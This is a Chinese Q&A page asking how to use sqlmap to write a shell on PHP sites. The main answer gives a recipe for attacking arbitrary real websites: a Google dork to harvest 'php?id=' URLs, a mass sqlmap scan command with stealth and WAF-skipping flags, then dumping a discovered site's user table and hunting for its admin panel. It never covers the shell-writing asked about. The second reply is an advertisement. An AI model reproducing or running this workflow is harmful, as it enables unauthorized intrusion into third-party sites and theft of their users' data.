php怎么用sqlmap写shell

发布网友发布时间：2022-05-01 23:20

共2个回答

懂视网时间：2022-05-02 03:41

在Google上搜索inurl:php?id=

将搜集的url写到一个文件当中url.txt中

技术分享

sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url文件

--random-agent 使用随机代理

--thread=10 设置线程数为10

--timeout=5 连接超时5秒放弃

--batch 扫描过程中遇到选项时选择默认选项

--retries 连接失败尝试一次重连

--identify-waf 遇到waf的站点跳过

技术分享

经过一段时间的扫描，扫描到一个存在sql注入漏洞的站点

技术分享

扫描所有的表

技术分享

针对其中的一个表user

技术分享

扫描这个表

--dump 获取表内容

-T user指定表

技术分享

获取到表的内容

技术分享

找后台可以用御剑

sqlmap测试php实战

标签：use thread user 针对 9.png map 存在 bat dump

热心网友时间：2022-05-02 00:49

楼主你可以不用在这里提问的，直接去找后盾人就可以，因为他那里的有专业的视频解释，而且非常详细，多看几遍就会懂了